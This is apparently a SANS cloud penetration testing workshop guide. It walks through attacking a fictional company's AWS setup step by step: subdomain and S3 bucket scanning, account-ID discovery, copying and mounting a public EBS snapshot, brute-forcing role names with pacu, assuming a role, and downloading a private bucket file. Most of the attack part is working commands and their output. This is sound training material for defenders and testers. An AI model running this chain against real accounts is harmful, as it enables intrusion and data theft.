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SANS Cloud Curriculum - 2024 Workshop Series

Aviata Solo Flight Challenge - Chapter 1

Systems Requirements

This workshop will require the following packages of software to operate:

  1. An x86-based system that is capable of running docker or Docker Desktop.
  2. Terraform version 1.6 or higher
  3. A web browser
  4. You will need to bring your own AWS Account that we will reference as the attacker account.
  5. You have created an IAM access key that is used to build IAM policies and other resources in that attacker account. If you used Named Profiles, please make note of them.
  6. You will need to git pull the repository for our system


To begin this workshop you are going to need to be running terraform in your OWN account in AWS. You would recognize this as your AWS Account. The structure of this repository is as follows:

  1. By running you have now built the container for this workshop. Congratulations!
  2. The terraform directory is for your attacker account. What does it do? It creates an IAM role called s3-searcher will all of the various requirements needed to attack the individual target accounts.
  3. Finally, there is the tools directory. This is another docker-compose directory that will be used to create your attacker tools.
Bonus Content

Bonus: You will also find a directory called build-directory. The in that directory will allow you to build the target environment in your own AWS account. The only thing you must be aware of is the fact that the target and attacker accounts must be DIFFERENT or the labs will not work. Use the build-directory terraform in your target account. This will NOT be used for this workshop.

Running the Terraform script

  1. For those that need to build their roles out you will need to run the terraform application in the terraform directory and you can do so by running the following commands. First, we will need to move into the directory and create the terraform.tfvars file. For reference, there is an example terraform.tfvars.example file that is provided.


    Please note that these steps will be shown from the point of view of a Unix workstation and will use self-referencing paths. Your paths will be different on the local system. It is important to note that in the portion where we create a terraform.tfvars file you must change your profile and region settings to be reflective of your environment.

    Command lines

    cd terraform

    Command lines

    cat << EOF > terraform.tfvars
    profile = "default"
    region  = "us-east-2"
  2. Once this is complete you can then run the terraform init and apply commands.

    Command lines

    terraform init

    Command lines

    terraform apply
    Example Results
    data.aws_caller_identity.current: Reading...
    data.aws_caller_identity.current: Read complete after 0s [id=3[REDACTED]8]
    Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
      + create
    Terraform will perform the following actions:
      # aws_iam_policy.s3_searcher_policy will be created
      + resource "aws_iam_policy" "s3_searcher_policy" {
          + arn         = (known after apply)
          + description = "SEC588 Container Lab Searcher Policy"
          + id          = (known after apply)
          + name        = "s3-searcher"
          + name_prefix = (known after apply)
          + path        = "/"
          + policy      = jsonencode(
                  + Statement = [
                      + {
                          + Action   = "s3:GetObject"
                          + Effect   = "Allow"
                          + Resource = "arn:aws:s3:::*/*"
                          + Sid      = "VisualEditor0"
                      + {
                          + Action   = "s3:ListBucket"
                          + Effect   = "Allow"
                          + Resource = "arn:aws:s3:::*"
                          + Sid      = "VisualEditor1"
                  + Version   = "2012-10-17"
          + policy_id   = (known after apply)
          + tags_all    = (known after apply)
      # aws_iam_role.s3_searcher will be created
      + resource "aws_iam_role" "s3_searcher" {
          + arn                   = (known after apply)
          + assume_role_policy    = jsonencode(
                  + Statement = [
                      + {
                          + Action    = "sts:AssumeRole"
                          + Condition = {}
                          + Effect    = "Allow"
                          + Principal = {
                              + AWS = "3[REDACTED]8"
                  + Version   = "2012-10-17"
          + create_date           = (known after apply)
          + force_detach_policies = false
          + id                    = (known after apply)
          + managed_policy_arns   = (known after apply)
          + max_session_duration  = 3600
          + name                  = "s3-searcher"
          + name_prefix           = (known after apply)
          + path                  = "/"
          + tags_all              = (known after apply)
          + unique_id             = (known after apply)
      # aws_iam_role_policy_attachment.s3_searcher will be created
      + resource "aws_iam_role_policy_attachment" "s3_searcher" {
          + id         = (known after apply)
          + policy_arn = (known after apply)
          + role       = "s3-searcher"
    Plan: 3 to add, 0 to change, 0 to destroy.
    Changes to Outputs:
      + final_text = (known after apply)
    Do you want to perform these actions?
      Terraform will perform the actions described above.
      Only 'yes' will be accepted to approve.
      Enter a value: yes
    aws_iam_role.s3_searcher: Creating...
    aws_iam_policy.s3_searcher_policy: Creating...
    aws_iam_policy.s3_searcher_policy: Creation complete after 1s [id=arn:aws:iam::3[REDACTED]8:policy/s3-searcher]
    aws_iam_role.s3_searcher: Creation complete after 1s [id=s3-searcher]
    aws_iam_role_policy_attachment.s3_searcher: Creating...
    aws_iam_role_policy_attachment.s3_searcher: Creation complete after 0s [id=s3-searcher-20240403171759720000000001]
    Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
    final_text = <<EOT
    Role ARN for the first portion of the lab:        arn:aws:iam::3[REDACTED]8:role/s3-searcher
    Command to run for the first portion of the lab:  s3-account-search arn:aws:iam::3[REDACTED]8:role/s3-searcher

    Please Read

    You may have noticed this line during the run of terraform:

    Command to run for the first portion of the lab: s3-account-search arn:aws:iam::3[REDACTED]8:role/s3-searcher bucket-name-here

    Please make note of this line because we will be using it during our beginning lab.

  3. With this done we can move on to the attacker portion of the lab.

Setting up our Docker container

  1. We have a docker container ready for students to run. Go into the tools directory to build the container:

    Command lines

    cd tools

    Command lines

    docker build -t sec588-workshop-container-tools .
    Example Results
    docker build -t sec588-workshop-container-tools .
    [+] Building 0.4s (13/13) FINISHED                                                                       docker:desktop-linux
    => [internal] load build definition from Dockerfile                                                                      0.0s
    => => transferring dockerfile: 924B                                                                                      0.0s
    => [internal] load metadata for                                                        0.3s
    => [internal] load .dockerignore                                                                                         0.0s
    => => transferring context: 2B                                                                                           0.0s
    => [1/8] FROM  0.0s
    => [internal] load build context                                                                                         0.0s
    => => writing image sha256:216d53c4397cfa2df2389ff8634d7f0298cc94fce705a106e07bc1c2cd08a01a                              0.0s
    => => naming to                                                               0.0s
  2. OPTIONAL We now have built our container, however, if you would like a prebuilt container you can also use our pre-built on below:

    Command lines

    docker pull mosesrenegade/sec588-workshop-container-tools
    docker tag mosesrenegade/sec588-workshop-container-tools:latest sec588-workshop-container-tools:latest

  3. Within the tools directory ensure you have a .aws directory with a corresponding credentials file. In this file, you will have the profile that you will use to login to YOUR AWS Account.

    Command lines

    cd <git-checkout-dir>
    mkdir ./tools/.aws

    Command Lines

    cat << EOF > ./tools/.aws/credentials
    aws_access_key_id = AKIA[REDACTED]
    aws_secret_access_key = VM[REDACTED]


Please follow these instructions to run through the actual workshop portion of the labs.

How to get an account from a bucket.

  1. As a mercenary, you have been tasked with gathering as many internal trade secrets from Aviata as possible. How are they able to get around the world twice with their aircraft? As such you need to start by performing careful reconnaissance. You can start by performing a DNS Reconnaissance scan of their infrastructure by looking at their websites.


    Please note that these steps will be shown from the point of view of a Unix workstation and will use self-referencing paths. Your paths will be different on the local system. When we cd into the tools directory, this is the directory that is called tools within the git directory you pulled.

    Command lines

    cd tools

    Command lines

    docker run --rm -v ${PWD}/.aws:/root/.aws -v ${PWD}/workdir:/root/workdir -it sec588-workshop-container-tools /bin/bash

    Command lines

    subfinder -d -o /root/workdir/subfinder.txt
    Example Results
    sec588-workshop-containers-ace135 $ cd tools
    sec588-workshop-containers-ace135/tools $ docker run -v ${PWD}/.aws:/root/.aws -v ${PWD}/workdir:/root/workdir -it sec588-workshop-container-tools /bin/bash
    root@588ace135fab:~# subfinder -d -o /root/workdir/subfinder.txt
                   __    _____           __
       _______  __/ /_  / __(_)___  ____/ /__  _____
      / ___/ / / / __ \/ /_/ / __ \/ __  / _ \/ ___/
     (__  ) /_/ / /_/ / __/ / / / / /_/ /  __/ /
    /____/\__,_/_.___/_/ /_/_/ /_/\__,_/\___/_/
    [INF] Current subfinder version v2.6.6 (latest)
    [INF] Loading provider config from /root/.config/subfinder/provider-config.yaml
    [INF] Enumerating subdomains for
    [INF] Found 2 subdomains for in 28 seconds 449 milliseconds
  2. We now have a list of sites that we can feed into a tool such as s3scanner which could let us know which one of these sites are s3 buckets or could match an s3 bucket location. The s3scanner tool works across clouds so it's not limited to AWS S3.

    Command lines

    s3scanner -bucket-file /root/workdir/subfinder.txt
    Example Results
    root@588ace135fab:~/bin# s3scanner -bucket-file /root/workdir/subfinder.txt
    (venv) root@588ace135fab:~/workdir# s3scanner -bucket-file /root/workdir/subfinder.txt
    INFO not_exist |
    INFO exists    | | us-east-2 | AuthUsers: [] | AllUsers: [READ]
  3. Do you notice that there is a bucket that has READ and houses our website? One of the things we can do, and this research is thanks to many individuals that are credited below, is we can figure out what exactly our target account number is. The AWS account numbers should be secret, however many times they are not kept secret. The account numbers instead are provided very freely to individuals which can lead to issues as we will see. Do you recall from a previous lab that we now have a command string like so: s3-account-search arn:aws:iam::3[REDACTED]8:role/s3-searcher please note that we will need ot insert it here, and use the name of the bucket we found above.

    Command lines

    s3-account-search --profile default arn:aws:iam::17[EXAMPLE]3:role/s3-searcher
    Example Results
    root@588ace135fab:~# s3-account-search --profile default arn:aws:iam::17[EXAMPLE]3:role/s3-searcher
    Starting search (this can take a while)
    found: 3
    found: 31
    found: 97[
    found: 97[E
    found: 97[EX
    found: 97[EXA
    found: 97[EXAM
    found: 97[EXAMP
    found: 97[EXAMPL
    found: 97[EXAMPLE
    found: 97[EXAMPLE]
    found: 97[EXAMPLE]8

Snapshots in Accounts

  1. We now have our target's information, but what attacks can we effectively launch with this? That becomes a more serious question as the attacks will not be done via brute force. Looking for misconfigurations that may or may not exist. List out the attack vectors possible:

    • Cross Account flaws and misconfigurations
    • Publicly accessible items that should be private.

    But what items are publicly accessible? Well EBS Snapshots can be made public, AMIs can be made public. ECR containers can be made public. Let's use tools to figure this out.

  2. From within the container, we can run pacu to list out EBS Snapshots. We need to supply Pacu with our AWS Keys, but this however is not all that difficult.

    Command lines

    cd /root/pacu

    Command lines

    source venv/bin/activate

    Command lines



    You will be asked to create a "session for pacu", this can be anything you like, we will use the name aviata.

    Command lines

    What would you like to name this new session? aviata
    Example Results
    (venv) root@588ace135fab:~/pacu# python3
    No database found at /root/.local/share/pacu/sqlite.db
    Database created at /root/.local/share/pacu/sqlite.db
    Version: 1.5.3
    What would you like to name this new session? aviata
  3. Now that we have pacu running, let's move on to importing our Keys, we will use these AWS keys to perform reconnaissance on that account.

    Command lines

    import_keys --all
    Example Results
    Pacu (aviata:No Keys Set) > import_keys --all
      Imported keys as "imported-default"
    Pacu (aviata:imported-default) >
  4. The next step will be for us to run the ebs__eum_snapshots_unauth module which will use our keys to search for EBS snapshots that are located within the target organization's account. If the command above gives no output, the machine is not ready; wait about 30 seconds and try again.

    Command lines

    run ebs__enum_snapshots_unauth --account-id 97[EXAMPLE]8
    Example Results
    Pacu (workshop:from_default) > run ebs__enum_snapshots_unauth --account-id 97[EXAMPLE]8
    Running module ebs__enum_snapshots_unauth...
    [ebs__enum_snapshots_unauth] Starting region ap-northeast-1...
    [ebs__enum_snapshots_unauth] Starting region ap-northeast-3...
    [ebs__enum_snapshots_unauth] Starting region ap-south-1...
    [ebs__enum_snapshots_unauth] Starting region ap-southeast-2...
    [ebs__enum_snapshots_unauth] Starting region eu-north-1...
    [ebs__enum_snapshots_unauth] Starting region eu-west-2...
    [ebs__enum_snapshots_unauth] Starting region eu-west-3...
    [ebs__enum_snapshots_unauth] Starting region me-central-1...
    [ebs__enum_snapshots_unauth] Starting region sa-east-1...
    [ebs__enum_snapshots_unauth] Starting region us-gov-west-1...
    [ebs__enum_snapshots_unauth] Starting region af-south-1...
    [ebs__enum_snapshots_unauth] Starting region ap-northeast-2...
    [ebs__enum_snapshots_unauth] Starting region ap-south-2...
    [ebs__enum_snapshots_unauth] Starting region ap-southeast-4...
    [ebs__enum_snapshots_unauth] Starting region eu-south-1...
    [ebs__enum_snapshots_unauth] Starting region il-central-1...
    [ebs__enum_snapshots_unauth] Starting region us-east-1...
    [ebs__enum_snapshots_unauth] Starting region us-east-2...
    [ebs__enum_snapshots_unauth] [+] Snapshot found: snap-0a[EXAMPLE]2
    [ebs__enum_snapshots_unauth] Starting region us-gov-east-1...
    [ebs__enum_snapshots_unauth] Starting region us-west-2...
    [ebs__enum_snapshots_unauth] Starting region ap-east-1...
    [ebs__enum_snapshots_unauth] Starting region ap-southeast-1...
    [ebs__enum_snapshots_unauth] Starting region ap-southeast-3...
    [ebs__enum_snapshots_unauth] Starting region ca-central-1...
    [ebs__enum_snapshots_unauth] Starting region ca-west-1...
    [ebs__enum_snapshots_unauth] Starting region cn-north-1...
    [ebs__enum_snapshots_unauth] Starting region eu-central-2...
    [ebs__enum_snapshots_unauth] Starting region eu-south-2...
    [ebs__enum_snapshots_unauth] Starting region eu-west-1...
    [ebs__enum_snapshots_unauth] Starting region me-south-1...
    [ebs__enum_snapshots_unauth] Starting region cn-northwest-1...
    [ebs__enum_snapshots_unauth] Starting region eu-central-1...
    [ebs__enum_snapshots_unauth] Starting region us-west-1...
    [ebs__enum_snapshots_unauth] ebs__enum_snapshots_unauth completed.
    [ebs__enum_snapshots_unauth] MODULE SUMMARY:
      1 EBS Snapshots found
        Keyword/AccountId: 97[EXAMPLE]8, SnapshotId: snap-0a[EXAMPLE]2, Region: us-east-2, Description: , OwnerId: 97[EXAMPLE]8, Encrypted: False
  5. We have now located a snapshot that has appeared to be made public. Given that this is a public Snapshot we would want to make sure that we can pull it to our attacker account, and we can then mount it as a secondary disk to be able to look within it. Please note that the string:

    Keyword/AccountId: 97[EXAMPLE]8, SnapshotId: snap-0a[EXAMPLE]2, Region: us-east-2, Description: , OwnerId: 97[EXAMPLE]8, Encrypted: False

    Will contain the snapshot identifier which is in our example: snap-0a[EXAMPLE]2. Make a note of this and use it in the command below:

    Please take note

    The following commands will be run in one terminal. Please make sure that you do not close this window. In addition, please make sure that the snapshot id you copy is NOT THE ONE listed in this guide, YOURS will be UNIQUE.

    Command lines


    Command lines

    aws ec2 copy-snapshot --region us-east-2 --source-region us-east-2 --description "Taken Snapshot" --query 'SnapshotId' --output text --source-snapshot-id snap-0a[EXAMPLE]2
    Example Results
    Pacu (aviata:imported-default) > exit
    (venv) root@588ace135fab:~/pacu# aws ec2 copy-snapshot --region us-east-2 --source-region us-east-2 --description "Taken Snapshot" --query 'SnapshotId' --output text --source-snapshot-id snap-0a[EXAMPLE]2

    Let's now save the Snapshot id as a variable that we will be using in the next step.

    Command lines

  6. Now that we have copied the snapshot let's mount it into a machine so we can inspect it. First, we will need the AMI that we can use to boot a system with, let's use Ubuntu 22.04.

    Command lines

    AMI=$(aws ec2 describe-images --filters 'Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-*' --owners 099720109477 --query 'Images[*].[ImageId,CreationDate]' --region us-east-2 --output text | sort -k2 -r | head -n1 | awk '{ print $1 }')

    Next, let's go ahead and create an SSH key-pair for us to use.


    Please only run this once, if you run the command below twice you will need a different key name or you will need to delete your key as you have lost your private key on disk.

    Command lines

    aws ec2 create-key-pair --region us-east-2 --key-name attacker-key --query 'KeyMaterial' --output text > /root/workdir/attacker-key.pem

    Command lines

    chmod 600 /root/workdir/attacker-key.pem

    Finally, with all of this, we can build a file that is called a mappings.json file that will allow us to mount the snapshot as a volume.

    Command lines

    cat << EOF > /root/workdir/mappings.json
            "DeviceName": "/dev/sdh",
            "Ebs": {
                "SnapshotId": "$SnapshotId"

    Lastly, let's boot the machine, please make sure that you retain the Instance ID in the JSON output, please note this command is shown to you in the terraform output in the setup. The command below is only for reference.

    Command lines

    aws ec2 run-instances --image-id $AMI \
                --region us-east-2 \
                --count 1 \
                --instance-type t2.micro \
                --key-name attacker-key \
                --security-group-ids sg-07[EXAMPLE]e \
                --subnet-id subnet-07[EXAMPLE]1 \
                --block-device-mappings file:///root/workdir/mappings.json
    Example Results
    (venv) root@588ace135fab:~/pacu# AMI=$(aws ec2 describe-images --filters 'Name=name,Values=ubuntu/images/hvm-ssd/ubuntu-jammy-22.04-amd64-server-*' --owners 099720109477 --query 'Images[*].[ImageId,CreationDate]' --region us-east-2 --output text | sort -k2 -r | head -n1 | awk '{ print $1 }')
    (venv) root@588ace135fab:~/pacu# aws ec2 create-key-pair --region us-east-2 --key-name attacker-key --query 'KeyMaterial' --output text > /root/workdir/attacker-key.pem
    (venv) root@588ace135fab:~/pacu# cat << EOF > /root/workdir/mappings.json
    cat << EOF > /root/workdir/mappings.json
            "DeviceName": "/dev/sdh",
            "Ebs": {
                "SnapshotId": "$SnapshotId"
    (venv) root@588ace135fab:~/pacu# aws ec2 run-instances --image-id $AMI \
            --region us-east-2 \
            --count 1 \
            --instance-type t2.micro \
            --key-name attacker-key \
            --security-group-ids sg-07[EXAMPLE]e \
            --subnet-id subnet-07[EXAMPLE]1 \
            --block-device-mappings file:///root/workdir/mappings.json
  7. We will now be getting the EC2 Public IP address to connect to in order to view the contents of the snapshot.

    Command lines

    export EC2IP=$(aws ec2 describe-instances --query 'Reservations[].Instances[]' --region us-east-2  | jq -r '.[] | select(.State.Name=="running") | select(.KeyName=="attacker-key") | .PublicIpAddress')
    echo $EC2IP

    The next step will be to log into our EC2 instance in order to look within the disk, remember the machine may take a minute or two to start. If the command above gave no output, the machine is not ready; wait about 30 seconds and try again.

    Command Lines

    ssh -i /root/workdir/attacker-key.pem ubuntu@$EC2IP
    Example Results
    (venv) root@588ace135fab:~/pacu# ssh -i /root/workdir/attacker-key.pem ubuntu@$EC2IP
    The authenticity of host ' (' can't be established.
    ED25519 key fingerprint is SHA256:QkbePxcv5PsCdkL52yCAUb1MATMV/ivu5VwWilHl7s4.
    This key is not known by any other names.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '' (ED25519) to the list of known hosts.
    Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.5.0-1017-aws x86_64)
     * Documentation:
     * Management:
     * Support:
      System information as of Sat Apr 13 08:57:11 UTC 2024
      System load:  0.40087890625     Processes:             102
      Usage of /:   20.8% of 7.57GB   Users logged in:       0
      Memory usage: 21%               IPv4 address for eth0:
      Swap usage:   0%
    Expanded Security Maintenance for Applications is not enabled.
    0 updates can be applied immediately.
    Enable ESM Apps to receive additional future security updates.
    See or run: sudo pro status
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.
  8. Notice the prompt changes from your container prompt to the (venv) prompt as we are now in our Attacker VM in the cloud. The next part will be to mount the disk and look for any sources of information we can find.

    Command Lines

    sudo mount /dev/xvdh /mnt

    Command Lines

    cd /mnt
    Example Results
    ubuntu@ip-10-1-0-224:~$ sudo mount /dev/xvdh /mnt
    ubuntu@ip-10-1-0-224:~$ cd /mnt
  9. Now let's explore the system. There are many ways to do this including:

    • Using grep
    • Using findLooking in well-known locations such as /etc, /home, /root, /opt and others

    Let's look for some of those well-known locations inside the /mnt directory.

    Command Lines

    ls /mnt/
    Example Results
    ubuntu@ip-10-1-0-224:/mnt$ ls /mnt/
    bin  boot  dev  etc  home  lib  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var

    Did you notice a directory called 'opt', maybe there could be valuable information in files in there.

    Command Lines

    find /mnt/opt -type f

    Command Lines

    cat /mnt/opt/aviata/data/plans
    Example Results
    ubuntu@ip-10-1-0-224:/mnt$ find /mnt/opt -type f
    ubuntu@ip-10-1-0-224:/mnt$ cat /mnt/opt/aviata/data/plans
    You think you found the plans to Aviata? Maybe you should stay tuned to and find out whats next...

    You can use cat, grep, or other tools to explore the snapshot more if you wish.

  10. Let's now leave our Virtual Machine and return to our container.

    Command Lines


AssumeRole attacks

  1. From within our container, we are going to run one more command set, this time we are going to show you the dangers of AssumeRole in AWS. We can create a word list of potential names that Aviata could use for roles in their environment. This is just guesswork but there could be several ways to obtain role names in the most naive way.

    • Documented Vendor Role names
    • AWS Documented Role names

    Any one of these sources may be able to provide us with what we need for this attack.

    Command Lines

    cat << EOF > /root/workdir/wordlist.txt
    Example Output
    (venv) root@588ace135fab:~/pacu# cat << EOF > /root/workdir/wordlist.txt
  2. With this wordlist what could we do? We could us pacu to brute force and enumerate roles. Let's move back into pacu.

    First go into the pacu directory.

    Command Lines

    cd /root/pacu


    If you do not see (venv) in your prompt, run the following command: source venv/bin/activate.

    Next, type the command to get pacu working.

    Command Lines


    Since you already have an existing pacu session, go in and make sure you can use it again by typing 1.

    Command Lines

    Example Output
    (venv) root@588ace135fab:~/pacu# cd /root/pacu
    (venv) root@588ace135fab:~/pacu# python3
    Version: 1.5.3
    Found existing sessions:
      [0] New session
      [1] aviata
    Choose an option: 1
    1. Now that you are in pacu let's run the AssumeRole targeting script, specifying the following values:

    2. The Account Number of aviata.

    3. The Wordlist we created in the previous step.

    Command Lines

    run iam__enum_roles --word-list /root/workdir/wordlist.txt --account-id 97[EXAMPLE]8
    Example Output
    Pacu (aviata:imported-default) > run iam__enum_roles --word-list /root/workdir/wordlist.txt --account-id 97[EXAMPLE]8
      Running module iam__enum_roles...
    [iam__enum_roles] Warning: This script does not check if the keys you supplied have the correct permissions. Make sure they are allowed to use iam:UpdateAssumeRolePolicy on the role that you pass into --role-name and are allowed to use sts:AssumeRole to try and assume any enumerated roles!
    [iam__enum_roles] Targeting account ID: 97[EXAMPLE]8
    [iam__enum_roles] Starting role enumeration...
    [iam__enum_roles]   Found role: arn:aws:iam::97[EXAMPLE]8:role/aviata
    [iam__enum_roles] Found 1 role(s):
    [iam__enum_roles]     arn:aws:iam::97[EXAMPLE]8:role/aviata
    [iam__enum_roles] Checking to see if any of these roles can be assumed for temporary credentials...
    [iam__enum_roles]   Role can be assumed, but hit max session time limit, reverting to minimum of 1 hour...
    [iam__enum_roles]   Successfully assumed role for 1 hour: arn:aws:iam::97[EXAMPLE]8:role/aviata
    [iam__enum_roles] {
      "Credentials": {
        "AccessKeyId": "ASIA[EXAMPLE]PJ",
        "SecretAccessKey": "WU3[EXAMPLE]Hlq",
        "SessionToken": "FwoG[EXAMPLE]A==",
        "Expiration": "2024-04-13 11:35:10+00:00"
      "AssumedRoleUser": {
        "AssumedRoleId": "AROA[EXAMPLE]HBQY:8Er[EXAMPLE]XkeYk",
        "Arn": "arn:aws:sts::97[EXAMPLE]8:assumed-role/aviata/8Err[EXAMPLE]eYk"
    Cleaning up the PacuIamEnumRoles-w8Zxb role.
    ..Pacu (aviata:imported-default) >
  3. What did pacu do? It generated an ASIA (Temporary Access Key) into the AWS Environment. Now that have found a role and generated an AWS Account key for it, let's use it.

    Command Lines


    Command Lines

    aws configure --profile aviata

    You'll be prompted to supply the AWS Access Key ID and AWS Secret Access Key generated by pacu.

    Command Lines

    aws configure --profile aviata set aws_session_token Fw[EXAMPLE]UGA==

    Command Lines

    aws sts get-caller-identity --profile aviata
    Example Output
    (venv) root@588ace135fab:~/pacu# aws configure --profile aviata
    AWS Access Key ID [None]: ASIA[EXAMPLE]PJ
    AWS Secret Access Key [None]: WU3[EXAMPLE]Hlq
    Default region name [us-east-2]:
    Default output format [None]:
    (venv) root@588ace135fab:~/pacu# aws configure --profile aviata set aws_session_token FwoG[EXAMPLE]A== 
    (venv) root@588ace135fab:~/pacu# aws sts get-caller-identity --profile aviata
        "UserId": "AROA[EXAMPLE]HBQY:8Er[EXAMPLE]XkeYk",
        "Account": "97[EXAMPLE]8",
        "Arn": "arn:aws:sts::97[EXAMPLE]8:assumed-role/aviata/8Err[EXAMPLE]eYk"
  4. We now have a role and an identity inside the system. The biggest problem you will have in a penetration test like this is figuring out what permissions you may or may not have. In SEC588 we cover many strategies around this, but due to time constraints in the workshop, we will provide you a path to victory here.

    Let's look at AWS S3 Buckets.

    Command Lines

    aws s3 ls --profile aviata
    Example Output
    (venv) root@588ace135fab:~/pacu# aws s3 ls --profile aviata
    2024-04-12 09:01:44 aviata-tlpred
    2024-03-01 12:18:08 cc2024aviatacloud
    2024-04-12 16:52:56
  5. You can look inside whichever bucket you want to within the aviata environment. Only one of the private buckets may be readable. Take a look at the contents of the aviata-tlpred.

    Command Lines

    aws s3 ls s3://aviata-tlpred --profile aviata
    Example Output
    (venv) root@588ace135fab:~/pacu# aws s3 ls s3://aviata-tlpred --profile aviata
    2024-04-12 09:01:43         76 secretplans.txt
  6. This sounds enticing. Is it a honeypot? Is it a honeytoken? Is it the real data? We may have to chance it. Steal the data and win the prize?

    Command Lines

    aws s3 cp s3://aviata-tlpred/secretplans.txt /root/workdir/secretplans.txt --profile aviata
    Example Output
    (venv) root@588ace135fab:~/pacu# aws s3 cp s3://aviata-tlpred/secretplans.txt /root/workdir/secretplans.txt --profile aviata
    download: s3://aviata-tlpred/secretplans.txt to /root/workdir/secretplans.txt

    Success! We've acquired Aviata's secret plans. Let's take a look at them.

    Command Lines

    cat /root/workdir/secretplans.txt
    Example Output

    [REDACTED] Aviata's secret plans are too sensitive to include in this document.


  1. To properly clean up the environment you can use the following commands from within your docker container.

    Start by cleaning up manually created resources.

    Command Lines

    export INSTANCE=$(aws ec2 describe-instances --filter Name=key-name,Values=attacker-key Name=instance-state-name,Values=running \
    --query 'Reservations[].Instances[0].InstanceId' --output text)
    echo $INSTANCE
    aws ec2 terminate-instances --instance-ids $INSTANCE
    aws ec2 delete-snapshot --snapshot-id $SnapshotId
    aws ec2 delete-key-pair --key-name attacker-key
  2. To clean up your terraform perform the following steps. First, exit the docker container. Then move into the terraform folder and destroy the terraform resources. Finally, delete the docker container.

    Command Lines


    Command Lines

    cd ../terraform

    Command Lines

    terraform destroy

    Command Lines

    docker rmi sec588-workshop-container-tools mosesrenegade/sec588-workshop-container-tools


We hope you enjoyed a taste of what the SEC588 Cloud Penetration Testing Course has to offer, it is a multi-faceted look at the world of Attacking the Cloud. While the course covers AWS, as you saw here, it also covers Microsoft Azure, Entra ID, Microsoft Graph, Kubernetes, Docker, and Cloud Native Applications. Join us in the Next Chapter of our ACE135 Workshop with the Class that is the direct opposite of this course, SEC510.